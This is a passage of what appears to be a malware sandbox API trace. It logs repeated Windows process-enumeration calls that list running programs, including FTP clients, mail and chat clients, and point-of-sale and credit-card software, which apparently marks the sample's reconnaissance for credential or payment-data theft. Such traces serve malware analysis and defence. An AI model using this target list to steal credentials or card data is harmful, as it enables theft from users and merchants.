hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="degree_sing_pretty.exe")) returned 1 [0290.243] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="work-heavy.exe")) returned 1 [0290.247] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0290.249] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="real-new.exe")) returned 1 [0290.250] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter.exe")) returned 1 [0290.252] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightwhere.exe")) returned 1 [0290.253] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge_model_ready.exe")) returned 1 [0290.255] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fearfew.exe")) returned 1 [0290.256] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bag-begin-gas.exe")) returned 1 [0290.258] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="take whether.exe")) returned 1 [0290.259] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="common trade station.exe")) returned 1 [0290.361] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="small_money.exe")) returned 1 [0290.363] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazineofficialteach.exe")) returned 1 [0290.365] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="involve.exe")) returned 1 [0290.367] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious_free_generation.exe")) returned 1 [0290.369] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hair friend will.exe")) returned 1 [0290.375] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whose.exe")) returned 1 [0290.376] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0290.378] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0290.380] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0290.382] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0290.384] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0290.389] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0290.391] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0290.393] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0290.395] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0290.398] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0290.400] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0290.497] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0290.499] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0290.501] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0290.503] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0290.504] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0290.506] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0290.508] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0290.510] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0290.515] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0290.517] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0290.519] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0290.521] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0290.523] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0290.525] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0290.531] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0290.533] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0290.535] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0290.538] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0290.540] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0290.557] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0290.563] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0290.565] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0290.568] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0290.570] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0290.572] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0290.578] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0290.581] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0290.583] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0290.585] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0290.588] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0290.595] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0290.597] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0290.599] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="discussion.exe")) returned 1 [0290.602] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="styledesignbusiness.exe")) returned 1 [0290.655] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="new_door.exe")) returned 1 [0290.658] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bed fight.exe")) returned 1 [0290.660] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="federal hotel.exe")) returned 1 [0290.662] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0290.664] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0290.670] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0290.673] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0290.675] CloseHandle (hObject=0x21f8) returned 1 [0290.675] Sleep (dwMilliseconds=0x64) [0290.784] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x21f8 [0290.798] Process32First (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0290.800] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x73, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0290.802] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0290.803] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0290.805] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0290.806] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0290.808] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0290.813] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0290.815] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0290.816] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0290.818] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0290.819] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0290.821] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x46, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0290.822] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0290.886] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: 